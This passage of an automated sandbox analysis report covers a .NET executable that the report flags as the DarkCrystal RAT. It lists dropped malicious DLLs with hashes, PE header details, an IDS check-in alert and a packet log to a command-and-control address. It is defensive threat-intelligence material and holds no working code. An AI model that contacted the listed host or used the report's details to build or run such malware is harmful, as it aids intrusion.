                                                            SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                            SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                            SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):33792
                                                            Entropy (8bit):5.541771649974822
                                                            Encrypted:false
                                                            SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                            MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                            SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                            SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                            SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 38%
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):23552
                                                            Entropy (8bit):5.519109060441589
                                                            Encrypted:false
                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):36352
                                                            Entropy (8bit):5.668291349855899
                                                            Encrypted:false
                                                            SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                            MD5:94DA5073CCC14DCF4766DF6781485937
                                                            SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                            SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                            SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):39936
                                                            Entropy (8bit):5.660491370279985
                                                            Encrypted:false
                                                            SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                            MD5:240E98D38E0B679F055470167D247022
                                                            SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                            SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                            SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):32256
                                                            Entropy (8bit):5.631194486392901
                                                            Encrypted:false
                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):64000
                                                            Entropy (8bit):5.857602289000348
                                                            Encrypted:false
                                                            SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                            MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                            SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                            SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                            SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Windows\System32\w32tm.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):151
                                                            Entropy (8bit):4.836131992046579
                                                            Encrypted:false
                                                            SSDEEP:3:VLV993J+miJWEoJ8FXUE5CQ9U5zvo0WLy6vj:Vx993DEUH2COGcvx
                                                            MD5:692605F689E3F671A623F4C2C4FA2FEA
                                                            SHA1:524DAA0A17D27868D57720D74F618A7255D989E8
                                                            SHA-256:204CA1746B0F35D8E994A8422CA010ADC1398D2947437EF6AC83ACA153DEA275
                                                            SHA-512:0315667D78C3264608C1CF2666F1D791DE0555ED0A3A078942D82893F93E32C763814CC5260C16FA55DE43911CFDA0388B35A4CB77080F1CDBB38E329050B85D
                                                            Malicious:false
                                                            Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 15/12/2024 15:01:48..15:01:48, error: 0x80072746.15:01:53, error: 0x80072746.
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.825669080809428
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Windows Screen Saver (13104/52) 0.07%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            File name:150bIjWiGH.exe
                                                            File size:3'700'736 bytes
                                                            MD5:e7870cd0c30a52066c454c15a5a5a2f5
                                                            SHA1:fc64203e05c104a116e7e4c354c9ee77c99737d6
                                                            SHA256:e4a958444e72eb1b3be02f3a8bf29044a81f328405a4969a4f66515ef219774e
                                                            SHA512:3e0a40959eaba1fbf3cb7a11707bc658421f3066e4e1beea56088ac213c10524127d4d9e2500e549a1ee608887c113973892d54fb91fae6ea9db4eb9e818bebe
                                                            SSDEEP:98304:sALvAvoV3JDBQSBK5f7a6uBt9iofavIa:smvvV5DpQ7a6ugoCvI
                                                            TLSH:9106F019A5928E36C2645732C297453D52D0D3363652EB0F361F24D2AD0BBF2AF762E3
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....tUg.................p8...........8.. ....8...@.. ........................8...........@................................
                                                            Icon Hash:90cececece8e8eb0
                                                            Entrypoint:0x788f0e
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x675574EF [Sun Dec 8 10:29:03 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            Name | Virtual Address | Virtual Size | Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x388ec0 | 0x4b | .text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x38a000 | 0x320 | .rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x38c000 | 0xc | .reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                            .text | 0x2000 | 0x386f14 | 0x387000 | 7485b124297f9f7f2c92f4d68711992e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc | 0x38a000 | 0x320 | 0x400 | d5d56b53a3d8bd8ef3235020baab9fae | False | 0.353515625 | data | 2.6517752881589467 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .reloc | 0x38c000 | 0xc | 0x200 | d5b912767e7d6031850cc8f9b33906ce | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                            RT_VERSION | 0x38a058 | 0x2c8 | data |  |  | 0.46207865168539325
                                                            DLL | Import
                                                            mscoree.dll | _CorExeMain
                                                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                            2024-12-15T19:36:25.013442+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49738 | 104.21.64.130 | 80 | TCP
                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Dec 15, 2024 19:36:30.547542095 CET4974580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:30.667507887 CET8049745104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:30.667593002 CET8049745104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:30.667602062 CET8049745104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:31.278477907 CET8049745104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:31.325953007 CET4974580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:31.543986082 CET8049745104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:31.591574907 CET4974580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:31.669461966 CET4974580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:31.670531034 CET4974780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:31.789661884 CET8049745104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:31.789757967 CET4974580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:31.790432930 CET8049747104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:31.790519953 CET4974780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:31.790682077 CET4974780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:31.910422087 CET8049747104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:31.910562038 CET8049747104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:31.919985056 CET4974880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:32.014301062 CET4974980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:32.039784908 CET8049748104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:32.039887905 CET4974880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:32.134623051 CET8049749104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:32.134716034 CET4974980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:32.134924889 CET4974980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:32.183593988 CET4975080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:32.254610062 CET8049749104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:32.303673029 CET8049750104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:32.303771973 CET4975080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:32.304044962 CET4975080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:32.425785065 CET8049750104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:32.482455969 CET4974980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:32.603600025 CET8049749104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:32.603622913 CET8049749104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:32.654339075 CET4975080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:32.774296045 CET8049750104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:32.774312019 CET8049750104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:32.774348974 CET8049750104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:33.222235918 CET8049749104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:33.263443947 CET4974980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:33.391849041 CET8049750104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:33.435348034 CET4975080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:33.534456015 CET8049749104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:33.575957060 CET4974980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:33.632921934 CET8049750104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:33.685328007 CET4975080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:33.726315022 CET8049749104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:33.764421940 CET4975080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:33.764513969 CET4974980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:33.764596939 CET4974880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:33.770478964 CET4975280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:33.890492916 CET8049752104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:33.890572071 CET4975280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:33.890738010 CET4975280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:34.012389898 CET8049752104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:34.012511015 CET8049752104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:34.014756918 CET4975380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:34.141474962 CET8049753104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:34.141802073 CET4975380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:34.141935110 CET4975380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:34.267280102 CET8049753104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:34.498130083 CET4975380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:34.618002892 CET8049753104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:34.618030071 CET8049753104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:34.618045092 CET8049753104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:35.236308098 CET8049753104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:35.279061079 CET4975380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:35.782630920 CET8049753104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:35.825931072 CET4975380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:35.898464918 CET4975380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:35.899162054 CET4975480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:36.019686937 CET8049754104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:36.019738913 CET8049753104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:36.019829035 CET4975480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:36.020024061 CET4975480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:36.020045042 CET4975380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:36.141222000 CET8049754104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:36.372960091 CET4975480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:36.492867947 CET8049754104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:36.492902040 CET8049754104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:36.492937088 CET8049754104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:37.144916058 CET8049754104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:37.200997114 CET4975480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:37.383358002 CET8049754104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:37.435324907 CET4975480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:37.513854027 CET4975480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:37.514813900 CET4975580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:37.635184050 CET8049754104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:37.635260105 CET4975480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:37.635649920 CET8049755104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:37.635737896 CET4975580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:37.635854959 CET4975580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:37.755644083 CET8049755104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:37.982553959 CET4975580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:38.103708982 CET8049755104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:38.103753090 CET8049755104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:38.103790998 CET8049755104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:38.727225065 CET8049755104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:38.734107971 CET4975680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:38.779201031 CET4975580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:38.860122919 CET8049756104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:38.860342026 CET4975680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:38.860690117 CET4975680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:38.980468035 CET8049756104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:38.992369890 CET8049755104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:39.044838905 CET4975580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:39.129533052 CET4975580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:39.130373955 CET4975780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:39.216974974 CET4975680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:39.249936104 CET8049755104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:39.250093937 CET4975580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:39.250190973 CET8049757104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:39.250278950 CET4975780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:39.250420094 CET4975780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:39.337249994 CET8049756104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:39.337403059 CET8049756104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:39.371138096 CET8049757104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:39.607448101 CET4975780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:39.728540897 CET8049757104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:39.729022026 CET8049757104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:39.729051113 CET8049757104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:40.002067089 CET8049756104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:40.044955015 CET4975680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:40.242865086 CET8049756104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:40.294692993 CET4975680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:40.352747917 CET8049757104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:40.404083967 CET4975780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:40.602191925 CET8049757104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:40.654233932 CET4975780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:40.727544069 CET4975680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:40.727787971 CET4975780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:40.741142035 CET4975880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:40.889269114 CET8049756104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:40.889386892 CET4975680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:40.891638041 CET8049757104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:40.891649961 CET8049758104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:40.891695023 CET4975780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:40.891731977 CET4975880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:40.891896009 CET4975880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:41.011626005 CET8049758104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:41.247925043 CET4975880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:41.369085073 CET8049758104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:41.369110107 CET8049758104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:41.369276047 CET8049758104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:41.979324102 CET8049758104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:42.029227018 CET4975880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:42.223402977 CET8049758104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:42.263475895 CET4975880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:42.354280949 CET4975880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:42.354980946 CET4975980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:42.480531931 CET8049758104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:42.480804920 CET8049759104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:42.480827093 CET4975880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:42.481076002 CET4975980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:42.481076002 CET4975980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:42.600855112 CET8049759104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:42.826088905 CET4975980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:42.946578026 CET8049759104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:42.946620941 CET8049759104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:42.946650982 CET8049759104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:43.572362900 CET8049759104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:43.622817039 CET4975980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:43.808235884 CET8049759104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:43.857337952 CET4975980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:43.935954094 CET4975980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:43.936511040 CET4976080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:44.056478977 CET8049759104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:44.056526899 CET8049760104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:44.056781054 CET4975980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:44.056807041 CET4976080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:44.056881905 CET4976080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:44.176749945 CET8049760104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:44.404248953 CET4976080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:44.525130987 CET8049760104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:44.525177956 CET8049760104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:44.525208950 CET8049760104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:45.143028975 CET8049760104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:45.185565948 CET4976080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:45.249335051 CET4976180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:45.369398117 CET8049761104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:45.369477987 CET4976180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:45.369661093 CET4976180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:45.387346983 CET8049760104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:45.435445070 CET4976080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:45.493597984 CET8049761104.21.64.130192.168.2.4
